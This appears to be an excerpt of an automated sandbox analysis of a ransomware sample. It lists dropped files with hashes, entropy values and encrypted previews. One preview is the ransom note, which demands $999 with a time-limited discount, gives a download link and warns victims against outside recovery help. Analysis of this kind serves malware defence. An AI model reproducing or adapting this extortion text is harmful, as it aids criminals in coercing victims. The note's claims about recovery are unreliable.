              SSDEEP:6144:XX1/zZw7NRIyVZVCpjBXvW6c6Dk3lA4BVcaxlnfB:n1LZw7NRIgVmluA8Vn5
              MD5:C9ADF0519E55F921889AFD6FD7CBF239
              SHA1:605FEF61C81E79CD13AD4F92B4D3A1109AC96A3F
              SHA-256:D21AE47F24EA2F6A25AFE03CE1C29C21F56A1A67E6BC0C9A9A716A5EDD4DF543
              SHA-512:AF88AB678123B2963005EDD0EA2E0908ACF1643AA29F3AF589FA5691220CA275F46C49F4981EBE7C6638572D60BBF9AA0245C62A3A67F073CE20203A8A5AC765
              Malicious:false
              Preview:Cr24.9..?(.=.H~`.g..d..J...4.%=F.t.^.[....C........$.....4v.%...=.Mp.....q.....h...x.[.7......s...^.~~e.t...X.V..W(......._../..S.....F.;.:..C.v...r$g..~X.....].8:..]...[.F"....4..X5DMS..s.DU.....6....m.......tyTp...f.#....q.......Fdo..+..t.0......n...."L.D.u....".5@.sYk..m8\...........(.{....[....%...al..9R...K......;...ui.0.......a..E.........../.'..iX4...._..<..4.......m..........4./.&....bQ..5..}.l..7..F........../6`b.i.7...W...li.x~...3~.Q..}2f@.j.d5..&...EvUv....H.[.;..^O'..daZ.D.z...;.ze..C..1..:C..C.G|.D.m..@....s$.O......=...Q.y.MR".%.L...n..T...#.fdc]M..k/7.......H.uA._"...wB{...@=..).>c...@b.Mb.B\...6.;..,.#x....c..3.;p`ab.(......n.4u.#..D....o.......g...".P`....._.{.J..q....8......=..j.n..H...A.3.(j.=.m.`..\.dL=...cO.t..Y....ul..BAf.cj..5..g+.._r..t(..e+{......a.'.R..l.V......<7......u... ]+.[.....0.f.}.....~6.E.l.Z..>E...G....%..........7..hSqM..b.....n,(|.....o...^.+...bd.....m..s....u.]U.).CP.a.....+.C........h
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Google Chrome extension, version 3334971395
              Category:dropped
              Size (bytes):1332939
              Entropy (8bit):7.991191232800492
              Encrypted:true
              SSDEEP:24576:p5p5txEhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLJ:J545L371GFrbBKiyGAo0EzatGaA
              MD5:5F526F0DEFC4FFD74D71E0A3C01ED0F2
              SHA1:C35601A3EAADCC0FD7EB15A93AA4B02F9C40548E
              SHA-256:9F3451D123EF3CDECA93EB99BE5AD187B29AA8DDCA6CAD168A408F92DE1223F4
              SHA-512:F17238BB9822842D7DD57F0E38F673DE61AE4F7B3FE8811D7EC40D2DF76235DA3065F9C03C1D2154497A20E8EADA5A22A0EB5D4DBE74264E82C6F6F4C39B64FB
              Malicious:true
              Preview:Cr24....<...............qB.:p......~|@.J.....l...,.a....b{b..i.E.!f...qU..m..x...B...(t.w.q..e.)....w.Dh.......9..g.+....~i..|.~..?[h;.V.~..$c.2..7....ay.<U...vk.2.*..{......Bw..C.......\..Q..E-8*.@....5.l......d../4..v2.]...prv...tT.1....o....t."Pe..3..lK..;...D.6.@!m....R[..Lq......KZ...`.a.I......e...u_....?..Y...@..5..}..y.4.F.J.......6..=.*.....!..Qm....bh.{..*y...t.......G!.%..gk...l....S.C.[Qa.u%..............].....<./.vh.....N.Xa$.$:...h....(.f'.... .-.Gq...0B.>0.e..(Y.,q....f.&.&S....V.........'%.*.Y..%X..02@.1.....72...T=X..V_..9.u.Q....d..,.U3........mh...6..XTa.3P.%`Z..pF....`YZ...#.'./.y...&.E...H.....6-.-._...u..\.,.Kg....,..n..&...#.....).....M.K.......8..<@...B5.....@.....So.1...P.]...k4.z.x.c r2;/.`...fc5......I...W...r....S.G..../R.Mu.L.2oe.&J......l.o.q.,)....,.p.......8..E\.11r...m..yot.......@.E.a.|......?..i.s..`.h.....ew.~...<..1o...r.^.O..6..2\.........@).84...z..9#...4.:.b.0...h.._6^..$k;k.-.!+f.|..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):894
              Entropy (8bit):7.750131116574549
              Encrypted:false
              SSDEEP:24:Y47pkRJxPKqvB80H/QLWnhuRdDQe8hHDDp7bD:Y9Kq20YWUA/DtD
              MD5:A914882C33A69762BB2234ADC1EFD61B
              SHA1:3E8EAA17A9B9DA8C43E9F684ED4899515D475BCD
              SHA-256:BD8819B37F43A1D6E64C899CBE622871DF547FF4E27EE9DD25242826A68D4E2A
              SHA-512:30D60A4C763DEB8A1ED688238EA54A93722D91BB3C1B33A2F83EFB5B8695C317022EEA4B39B3192E7BF334E6309D4F78BDCCD9155EA244A5ED12A7DA62529EC9
              Malicious:false
              Preview:{"pub....%..Y..<.,..es..l#X.M....f.!.....?P...j.f..w..T._,..}..w...&p..}.?..T..Q.U.D.e..+......!;..4..".G=!^q..].0...%t.c..........."A.!.:..i.....S..h..{.:I..uBFU..t.R.W......]....veWc.Vb..].....ox.1..<W...j..)f.-....l..:.$..b.Uv.I...`.g.+.U.P....C..Di%&.]LK.T.....o...a.b`.2.!..{........Z&6.g.u..i..@....%..>.....3....b...$73p..}.9`.C.......N....vw....7.p*.K..w.&VwP.....vDG...r..IY.:..2..c....<.8mT.q..z.j.!.......W>Vk.C...2.........u=..4.....g.../.....u........`.Q.BB.y1..g%......*.1.Nr.1Jc..U.....$FL.\hR.]....;...if.~...\...!.r..`.?C..yE.yUp%.=...KPud.a.Z..d..w...Ta....8b8.0qz.OhAT.$....v<........./....WY...E_DZ1Y.(l......C8....r.MZ[]...$..\'R<..M...K.....q.vW.7...cN*....'.n...C....[...I..EI..1..7@....C..x...8,.=p.P..`h...&..n..8c..3..xe.H.4ho....._#..V.w....l".kk.`P.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1193
              Entropy (8bit):7.821269600671944
              Encrypted:false
              SSDEEP:24:nuoEXSIVknHDiRNWXUFGAdJ/XehyfNHfDDbD:tH+RNT5F9lbXD
              MD5:6841F8E5F6D287BC7DE78BFF8CA46636
              SHA1:820022452D3B728DDEFE3128ADCDA174954CB1A1
              SHA-256:FB96C99320076AC02E90E87ED0AB3DCC83E20CAC3FAD40F909C6849F73A2BEC9
              SHA-512:64E74C4CA22048C710A73990088DA78BA4C4F4CAA7A0228E9C2777D1FCB8B5A15055D59F09EB8BCEDA2DF7FD47EA15CF44C58D02C5AF2189CA4FE1B5CACED6EF
              Malicious:false
              Preview:<?xml/......B.~.,.......6.~..G;..Z*K....YXp.A0j..=Q...FuE....l...0.20x>.?.4+.`.e|W./.3..^.......!...L.........V....X]..............5=.Bg..Z.F.K.6b.D...;|.a...4.....eWll..F...A..JI....~....S/............U.X.=...#"2.wx.}..4.<.(..#.<7.49<]. .v..jsw]....P.W...AM...I..L..m.L.t..u.n....H......wC,wLl..........h..*..AS..&.H..j....rt.s#.:<.r..NF$..(9.=.Q.c.&.F.E..].@..).3.W.O..9$...zaL.x....6.......h..8.e.N.A.....aN.qg.+...k..C7.........8...H!\.31&..Sa..q$....^.M.......[dl.$X....9..O...C..d...b*....k'&.]._>"..9.;.@ +.]E;qT. jKTW.?.....y...m.X....^zV.gV.#.*.......0Gu2..R..z...r....X3R$Y.A.3..A......x.U.yF.....1..d.h.l.....B...&..n...+X....O..;'....rgY.T...cd.L..;.YG^...s...]!~;...1B.ne......f.}n,....u.I:....}...e.!..m..T\Hk[....G-...U..Y.k...d...d..i$.............ls.X....J9..`]`....v.L.k..h.U.Fs_....uB~...<....S@.v.....p.A.".C.d.|.....(.-..<4...9~...8..o~?....,1Hq.8..c(m.k.vf.@~.]5..v.}.@...Kb.O..f.i..K.)..%..B+T......`D.g.;.M...@_..07...
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1193
              Entropy (8bit):7.821269600671944
              Encrypted:false
              SSDEEP:24:nuoEXSIVknHDiRNWXUFGAdJ/XehyfNHfDDbD:tH+RNT5F9lbXD
              MD5:6841F8E5F6D287BC7DE78BFF8CA46636
              SHA1:820022452D3B728DDEFE3128ADCDA174954CB1A1
              SHA-256:FB96C99320076AC02E90E87ED0AB3DCC83E20CAC3FAD40F909C6849F73A2BEC9
              SHA-512:64E74C4CA22048C710A73990088DA78BA4C4F4CAA7A0228E9C2777D1FCB8B5A15055D59F09EB8BCEDA2DF7FD47EA15CF44C58D02C5AF2189CA4FE1B5CACED6EF
              Malicious:false
              Preview:<?xml/......B.~.,.......6.~..G;..Z*K....YXp.A0j..=Q...FuE....l...0.20x>.?.4+.`.e|W./.3..^.......!...L.........V....X]..............5=.Bg..Z.F.K.6b.D...;|.a...4.....eWll..F...A..JI....~....S/............U.X.=...#"2.wx.}..4.<.(..#.<7.49<]. .v..jsw]....P.W...AM...I..L..m.L.t..u.n....H......wC,wLl..........h..*..AS..&.H..j....rt.s#.:<.r..NF$..(9.=.Q.c.&.F.E..].@..).3.W.O..9$...zaL.x....6.......h..8.e.N.A.....aN.qg.+...k..C7.........8...H!\.31&..Sa..q$....^.M.......[dl.$X....9..O...C..d...b*....k'&.]._>"..9.;.@ +.]E;qT. jKTW.?.....y...m.X....^zV.gV.#.*.......0Gu2..R..z...r....X3R$Y.A.3..A......x.U.yF.....1..d.h.l.....B...&..n...+X....O..;'....rgY.T...cd.L..;.YG^...s...]!~;...1B.ne......f.}n,....u.I:....}...e.!..m..T\Hk[....G-...U..Y.k...d...d..i$.............ls.X....J9..`]`....v.L.k..h.U.Fs_....uB~...<....S@.v.....p.A.".C.d.|.....(.-..<4...9~...8..o~?....,1Hq.8..c(m.k.vf.@~.]5..v.}.@...Kb.O..f.i..K.)..%..B+T......`D.g.;.M...@_..07...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1383
              Entropy (8bit):7.84341956661969
              Encrypted:false
              SSDEEP:24:/hxXxQKbysliwDarqIJV3uJ6H0fJVGM9nwxTnfQunvAebD:/XNwwORJV3I2TlD
              MD5:CA31DFD2C42EB52D076DAC6280C1147E
              SHA1:67F7DC5BF739336AA36AFB3CB5960668E87A8A68
              SHA-256:5D6E16F046FFA1C6D04BAA6AE56AF572B9E8A52EE2D10A1BFDDBA258D99685BD
              SHA-512:BF2E44A2C4E52177A63BD9EC0B44171999262F299804A461DF249CABB49E8F416F64BCC106F873D94A001CF60C86A6B1463D0060BF87A6C6A83A8106EEC045ED
              Malicious:false
              Preview:L..........-<_.Ga.u._....H..1....b.@@....n.&.........eOR\sdV.|r.H....~Y...<..^. s..V.B...l..:.!x......V...B..YHL.`.).V.#.|..z...E/...N....._^...t.e.9....W...)..@..I.!k......GN.Z..)TS..BX.L....b.v.t...!C....9.....=i.-...V.k.zX... N..f..'.. ...pV...J..+pM.|.VY>.O).....%E.g=P.2..B..C.]$..2.....)ULDG!.D..)2..-4.t6.L&..0...-B.@...G(}~i.?.m...-.}4.F2.+....[x5...v.. h.. ....O_t.%.C.)..a.g.E<..~.J#v aQ...y..F.o...l....J:..lT.e.3..-k....7}"O@md.|.........:.f,.k..tS){m..CM$HL.=.+...-bc....;.?..=&.....g.H[.$.}.TuE...........c0...;.c$Ot.).`..%z...!./...5(h.....0.6../.3.#........#..w+..^...Z..$6o..wA...[.V.$......i.r..=.9.+$......ov)q..4....>.-......^.....2...TjVg...+,p..Q....C....~...:..o:..p..+....{}...te.{.s.v....B.Jr.F.....(.0...._.z...$..J,...M..7JKT.u.%.bd..Si;.ZmL7./....)....\>.]..:.....E."...X.....j....=..@.a.?R..N.m.M.....V..}vr..L=.W.}...w.....u.....o.g.......lj)...?.Y.f.r..<..R.h...R.... .BS...dM.vz....C.6z..5.D.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):341
              Entropy (8bit):7.221505193274813
              Encrypted:false
              SSDEEP:6:0YL28MmhSTVfTvTpJnybr/+KIcGJrF2BTiNRl7dg/YPFUe6U33ukIcii96Z:z69T59s+KeJDNf7dAQacukIcii9a
              MD5:B9C8E61563631EE84342BB3CA0E310F0
              SHA1:78C5495BF9F0BF80011806604FB433631CEE4D54
              SHA-256:D6D567C2A7BDEDF21D9E2F77882CBB0ACAA1469DEC59A84E19BB4958F9FEFE96
              SHA-512:DA703D89D4573CE99B70D3229F8F65627E52B1311A03C6F998B06541DDBB461028195E143758A87BD26D805662707F29516C282994C8350A25CB394415AD31FB
              Malicious:false
              Preview:deskt{.......MO..R.e...z....Q.....v.3>Q.X.).#..}J*.._..W.o....*..i<.$..$...-.b.y.+..'.........}0.....I%{). ....&1.......M/3y.....mqlr.v*.j-.i..W.ml....w.2.(..$WAMdp.$....(...l9.A.w...W..i../.h...@..2.W.;...A.E....M12.P..#._\..|-.L....A.. ..;.L4WW..TD.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1381
              Entropy (8bit):4.87972850781078
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rx:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k0
              MD5:242ED9093DBD2B45ED7A82B7BCCFEF72
              SHA1:FF3E9910D40999CA2F85F642F4AD7DDE53F9CFDE
              SHA-256:D8C1F5BD75A74514C114D902DD449FAE1ACAF6856B3EBD2BD6E3319BCE2ED968
              SHA-512:65196DA7590F9AC581160AFF99A15BAC5435A989EB48F668519CE31416DBE7BAA74DFFC446FFBA082AE9FC0AD26E3CEFBFAEAD245C81F4B7C72C2DB1605292F9
              Malicious:true
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):11214
              Entropy (8bit):7.9826366606133865
              Encrypted:false
              SSDEEP:192:boW/8kuACxsVmRrh5vpTtomhnu6esnF0/dkl1rc4grsmc2huEyi+y/:Yt9uQR5toCn1esadercduEyi/
              MD5:7DAA7C2D7AF4B46D99FB4E1E4B426786
              SHA1:374647AB07ECB27F559147FEBA68F0689A8F3943
              SHA-256:EF2C5A40F362F56016EA76D240AF4A7F3A580287546F68CBA4C62FD3E0F13C13
              SHA-512:F31E7CBBE95CEA4F3D93CEBC6682E2C2FBC275544230CF3AA82F353EBEC95C5AE35318C68DF20521EA29F1F3342F413AFFE7DED202ED7E11D6BA14EF2841DCF5
              Malicious:false
              Preview:%!Ado....6.R.....$...pe....H...Z..2.&..\|.....Lx..lV..`.;.=...r..= }.....p^6.....q!.>x..Te.R.^ ..&q.._...h..Zr..[........])...Qw..... ...r....U...6z....X..x..G+....'..H...71.9o.+.@;t........IV.3.C...4*..........o1.HZ>..U..3c..>@.jmk^...=...9.v...Cs.]#.\...2.i.......2.P<l..{@....`.K..Y.?H...=H....A(...>.0eT.i.+...w...+. ........~... +.d..W&.jOJ.......^v./.W1.Lovv...l.:...Y...o.A...U.:&......!.!C...=.....X...#.....)..u....P.M.e\...8a...U.&..o...S...!>.).w4.b..z..d......&...Le.F...N.{"x.K...sit....gK..)....v|]*M.........i...J...}pU.Ii.[....yV...:..W&dO.&P.!...u..K.:.).o%Vak.....3.F!d...p.3\D\-......@..(.;..>...sy..$.MR.n.i...wV|.w....r..".$2Fd.r..p.Q.|.$..l.X...x$.z...gc........g&um_{........[.H..n.O].....`......@L.m|..!..S.....X?.2..W......_.j...Q....Qk...J..H...n...f?`..N]..}........O-.8.4n.w....:xF...6b^D.U.....4..R.K{.-..UQ.V#...c...?.S.H9...l.u..h.9!..B..fq\....-H...f.l.J.-9.<i)]..7w#....H>Q..../.g..%.+h........d....(..78t(a...s.m.hm..+.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):932
              Entropy (8bit):7.787353172972347
              Encrypted:false
              SSDEEP:24:IMVWr61rZ1UU0syX/ZzjR67nxI71h0+zAwscdJbD:IMd1HexzjALxh+zAw9pD
              MD5:64044B7C22FF5EAC830B33F48E396480
              SHA1:0E36CC8B62276D5DD693819DDA630FA0FEE3DD61
              SHA-256:9C278A26D067CDB3317D17A686175F442D388318CD9E52BB97148BBD651541B1
              SHA-512:1B125AEA98AD530E0D520DC452EEDF834EB31DB7639D07C4BDD7F4EE2C3E241AB43C38B7696760F82436FC0572E51C2BC198377793DA28EA77C0520C11E8A80E
              Malicious:false
              Preview:CPSA......jM+.CF...2....i.6D...w..0..f.J.L4}=.ZQ..x.....yg..A.xg2Ue....M.jx.&$....6..[.G`k#^..>...;gbbL._..Ws.=B.f..].5......]......E.+vg....g....g.R...z...B...X.U..=..gs..4.}:Q...V..g.w......z....^."e.c.dG..7.I.h..}.........9S...T..H..JD.d+...Ra....&@..`..F?..s<}...W/e.(u.....5..Mj. ..G>q...6t.A..ZV..1..L...XF..9...k.A\......Q..I-.J'...,.e+uq.)6...TG..{.wUvE....nz.E,...8....v.h....P..I.b(K+.l..~...... ..../OT...D....q...r.#a........a......@...`@ueF5.`k.....+v<................c..&....,).A]N.........($0u.i.`..0..@.<}.#..b.Y..--.Y..9....A.!H...=^..Y.a.QK...L].&..E...).z>0F...}(.%_.#...MH..u.t.t...D..L.`%.r.....Vd...t......@U.#]..".&..x.'...v.... .*.f...])....L...4.@...9...z.s..s.$TtTo~...@0.#<...;V..I..m.,/...`9..;E...c.._..M.j..&...g..........@..qUsa.<.#.J..7.....^.2:n......nk.(f...../.otp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9779444058656015
              Encrypted:false
              SSDEEP:192:frxwFlQ2os73r1GAekz1KCsW4c+jVCLAe9Fx5O5cUKf+:ijIyAAeE1KC3X+Ze9NTUKW
              MD5:77D640BF40230143F44DA9BA870E1B93
              SHA1:0A51BFC4B256614DEDFD7BDB258AB9B705B8167F
              SHA-256:85C9D233F743E93A3E42400504B342818CCACD52C456B056945555014F875B5F
              SHA-512:D445ADB3CD8D0328726C006DD13C247CB76E3792900F4BF03E6E79322EA35A49AE949B92ECF9545172B296B138743AE02591E81060E2DD21095A8EA68180CB5A
              Malicious:false
              Preview:.M.#.Iwm.8Z....]k....-...E.~.O..}._A...mMk.......'..-...Df..|^).@.Y...t...1Z4...Q2Gg..a..7o .........w......j.......\...c.....P.O/E.X..C...XR=.o....,/I..MF.m.........SP+..#....F-....l.}..4.v3.]..^1..3*av..|.I.3...u.M...8"E./.kR'.k....jBt-.U.._Jjx......2.......{...N&.b=V......6...d_S_.Y;4......@..<..&..G...I.YS(....1Ipw.......!M....M1.C..Fk......'v.'..K.S%v....."D...|..2..Q\.....|.P.dxH."|H.......b6....^../.n.i9{[K.wp....\l.?..Y.aW.....P...]...}..`9...>N.*u.l.9[O.u......1zMN.....L..s.}:...:.Oj..Ii!*.Y.~O..O..l<...\i".'Q....Sd0|.C.......^+...*.&.M.d.....}$#.........J.].b..k.1.../n\........ ...W2If.._.5..f.......X..tx}B.7.#b..U.t.....2...(+t......@@.....~g>.l.+)A._..0...9.-.B?T..W......7..[b.9.c.*x..j..$....LP..&V.....&..l.:..^w..iU.....s....{.J%.....G...px...V..s/.....aH#..-.}......o.H.>.io.Q.g.9.....?;+/...s."c.u...9U|.H.2..S.b..O...ma!.?.t..:........#....D....Q6H.._P^,..}..Wj)..`...H/_.H."...Q.h.........]....t..OnK....f.S.\ve..d<V(7..U.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3146062
              Entropy (8bit):1.7312016935199748
              Encrypted:false
              SSDEEP:6144:cw4xucpwpU9vgm9QpGIsXc1GOo3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXZAcl:dckUvtaBsXWGmfCdYSy
              MD5:7B6FE0DFB4ED6E0D57E3B76B19061FF6
              SHA1:F0DB08523C1D9822C9FB84489AFF896F9B23E50B
              SHA-256:3B90A2DA8DBED51528AF733F75414D9F2079EE1859D0B761870885389CEECF46
              SHA-512:209D426DE12F94EF2767657A6EE9BE0BFA5B219533109DD95394C0CE53D8FD99D022E781ABC0A49039B44C4A4EC395AF029CA699DE3E415A3DF233CDDD770B63
              Malicious:false
              Preview:...?..9..N.~Sl.k.A.....G..'y.. .5.3f..Jy.G...yZ.f.@.>..].d.r0@.S.z........b..)-b..3.f..X...G..W.m.1.@ ..T.BJ[.b.... ....8.\..A)..&R."...B..-....~.."F{...;..k..........gbP0.$...A...x%.73Q..'d.N.D~.....<.C..Y{..-B..[....Q...a[.!..B..4b"..... /..Fd\...tCL....%\......L....Ue.PM.{...5..c........}.j..<......R..M..e..c...a.....?.......L.'...A..............o.8.$..Y...R.7.Rm<.d..y...,L....".tF.-hbc...B.....e..i.1.R.r?...,..4..H@:.).......H.&&[E7..feh..;....&U..j.6...".Q. 3......F...]Y..K.U.<....'Db.. j..[.......S...D.(..N......'...RO.....u`..p..0..8./........lf.@...G.........%..k`.o.{..A.4.y...P..X....-z.7....#Y.B.IWj..(.!.j.......D.....1..<....Y..e......U#-q.B..?.'.;.r....D.....;...H...u6}..F..O7.G.N...+.@.H...\.t`.oP2T-I.@.iG..#ISD....!...e.]<......~4..Rr......u&O.b."......&j.....)t.QZQ......wf....N0W..3d.F.).n".B3.u..w......f...ll..]*.o..r=...&..3,..J.......o./k....Cj..0..>.[......O...a.=....D.C......pz.#.>..S..D..ri`.P*.../...<..._...MU.x8....w)Zg
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3146062
              Entropy (8bit):0.6707015357172491
              Encrypted:false
              SSDEEP:3072:DSn5A9d0aEgSLBQGoCKO1zsowHHGtHgsbaX4qoTVY3BcIyTtK3F2in:+nWT0a7SuZAPwHHiHxRTK3B8g1N
              MD5:1BDF8CBECCDCD0D30B0C4B6AEA18FE91
              SHA1:1C2DCE495F651ADFE8A43982703ECEA492AEF168
              SHA-256:7FF20E8498DF392EF7DE98B9E2789434672E78ADF6E479E98C7D79DBD2A5A196
              SHA-512:11442513158EA40B977CD5A4873E51A93AD73C5D47EC13024D017CB4CECF76D35BB79F8D1A8558EF01C0650D1FE2B029067D9FE9CB4559D12C2D332A95915F54
              Malicious:false
              Preview:.......#..3^|.ET+..{..j.....Z.....C;..^.L...d.VRz...F..'5&'~1...3_..qYF.8.o~..!wv.5.bg....H..k.....N5p-.u..]..`..K.H l..R.9....Wr...Ab.[..].....V2...h.....5....U.>.....spaE.3.....Z..f.e.i#...{...X..i(...w..i(*....F..<...&.lc..........[.....Z....w.mV...Z...~Y...c....L..OYa7Bw.k.CR....n`.~.....EH...3...Hc..i....zyp.EE.L.r..M<._._..OG...7.."U5...Y..q..!.....................S|.FI..*9.G....W..<...xD+...mk'=........p.%A^K..^....-....M....A...r............w...#...k...w..L\.q......n).i.R.e..9...c6K*.9it.I.7..b.zr.....0.l..N.}....2~.sX.XB.n...I.......NC..4....C.?..l.[6{..*.......x...F|.nS..0....]D.....v.=i..<HtO..X.6m..{2...=E.:.._...p!.Zp.e...O..... ...........)..].9....T64<.._AEvM.#.....`d.Z...R.....gN..fZ.>.nlNY.~.......g=Xc.L...2|.pQ....O..I..)p....^.??/cdCRUos...{I...Ty.3...4..[u... .I..g./..<^sG.M.q..).G.{.{.>.d^...a.8...H.;....[./.=..t.#..^.....^...u...E....S0.0aA...`Z.d.....s..2...2.ZI<|I\......WI..$.........I............S.K
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3146062
              Entropy (8bit):0.6707950949916883
              Encrypted:false
              SSDEEP:3072:gwoLh6BH5LQzMjvIu2T1kj5Gz3WhyXfu9rqmPDID3JOdiks7A9DSqaGHFezc7FC9:gTwdOzivYTeydXBbG+RGHDBCsa
              MD5:31DAE818F2AB5162866FFA43861E6134
              SHA1:4ADBA7D928DBF044CD412C6C26FF7CADD07D04C8
              SHA-256:327DEAC3BB2F79849C6C593A9058739B6DBD8015F1C9B1518D90A4BC62777F12
              SHA-512:72FCDE86335CD62D1FC135D3AD2F87B180B23D75439AED07DB98EACDCADC46E0367243AF17946B9FE3FFC9F7CF514C31F8CC6A1079587CE6FC16D865222293F3
              Malicious:false
              Preview:......tw/....'.n.*.....`.r.......1....1P...~\4..W....W9....N<\.......s....?3.....[.E X.......0..\.g..]t!*.}..`....S.6.YD.f]........o..j#."E...7....WcZl.,......+.'.|.Qa..".8..M...Z..Oa,.....ogdwGx...+..@....O.<*.9.BT.....O.....;x.......5"..C5.DO...-..L ..wg.{j..6..........*.v....M...:."g.....u.?Z=..g)xy..^Q..w..$h..g..qg.... E.;V..d...n...x.X..,{..d..%.mSj.v]Y.....T..v..7r.....G..O:..(.(.P.Z.(..^)2^.u.5....Fj.,..........a..:..MC..7tT.@.1.......7.I2...x8H..!...Sq.?h...D..6..P...{....?-G...k.)-..(..8:..|!.^jgQE..X....u.6x.y.=..%...A..%.m:.......k6.S:-Q$o....\.o=..4}.....N...%h!~X.nwXH...Z.......3g.(.(.;.2.q...h...?/..m]5p..P.6.:..@r.....J.".<.n7...W........&..T.i7,......l`.......^...I,..p.....<.a.xu..:..L..i..].Y[..Y4.l.Y....?E.2M"% ...1.6"'....8G.tC1q...d.}e.....c.p(/>.....0...GL..5...k.<9..._\..?S..R.,.%&..IA.7*.d9...:..:.......I....St..w(V.w..{[k.f..4....e...._R..1...D..E.....C..{.LNj.bO.O...D.>T.ii.eB.].@R....Q.~...U.@..m.lU.[^S
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3146062
              Entropy (8bit):0.670666878516048
              Encrypted:false
              SSDEEP:3072:DRLwxrxGU9e29BcVAaYxvLgBYHWi2//iETcSfSpbuK4pusBL:DpwHGu5a4+bi2//iEt6pcd
              MD5:FFDB63D7ED49346D4E1B5C8947E2D6E6
              SHA1:F43D3E346749E714817E6D1BE7F3386864E049EA
              SHA-256:81F26E5760374D8DB58F0651431C8E56E3BB354A8B19ED38A0773F14AA998F61
              SHA-512:45E1975059880C0BFAE6EE8ACF287F056DD1161996E5239FC0651013FE2BBBCBD8F9B567909DD41F3FA8D3EE4B7C898346D8A35D030ECC80E30172998D70B7D5
              Malicious:false
              Preview:.....*..\L.GbKb...{.Y.Q. t..".c.....^...#.AC.:.L..F....f..3...J.X....%.I......I.~~nj..[V...^..TW.....|..|.5.tG..8.[>n,w?..q\gw..9.=l..`@..j.s...6.TSQY.....n.D}.8.....'.>x..O......C.B...]....."...6..b.Hp^k.S.x....9....#..4-)...,....;...`Cm..*...2D.$.....yt.c.@v`e.4R8c.v....@.kgm..\...[(-L...w...n...Y..h\.k..3..5....&......k..l.C....7.......{._.|ts.e..\8..x8.bL&?.y...[.....lCB S..<d{....."....FJ.....#RV.S..'..]g"%R...j....d.=....j....**..~w...M..rQ.U..n&c.8..,..mIpr>..pv5.....>.Sn%..). 9..d.Z4#.?..f..w....W]..$....7..v.....M.i.R...4..c..A"W.t.F.....I)...d.M.k...*U.....J.,...y_/..z..S.v..?./!.$.EPD....[.wM./......8...>*.i..:$......o..?V..Sf...s/)Eo.....Be.r....W.>.._q .......2.......<.....h..&..X..Va..c..e2*.%N.<.8.A.s..>/@|..0...E]*....~JuH..].4|.3|...........s.e.....[b}%#t.....Xo...9.r...C{..5&.-...G..[....B.Q.......l.].`...I,......>..8.(Q..uD.s...C3...PBF.......G."...7.?\.....,'....W..x...1.M65\..\.M.u.X.....zCR....~...(.u...p..M...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.98865818064493
              Encrypted:false
              SSDEEP:384:YR594GxSF9/0ChVS/4xznNLrGXOHZ4iWbu7Cn7fzZ02jg1xXsGdZ536Ro:Yx4Kq0wVX7aASiWbu7Cn7fz98HXsGj57
              MD5:59A74AF4D31C13AD61F631D45EA0AD37
              SHA1:06FBE1E2DF160BB0E64383D5A4C04EA850A65780
              SHA-256:DE754DE8B17D48B8B59C25087FA45075955162B4BEA9C875796ADDD1E9E1DA8A
              SHA-512:8C4285547BB2D878BBBA720C4C760FA947DCFFA275616FCB427443455083A0BC384CAA30DBFD029DE3A721F89482AFF01BE1CE72C46F7B7237D663D170D0D6B4
              Malicious:false
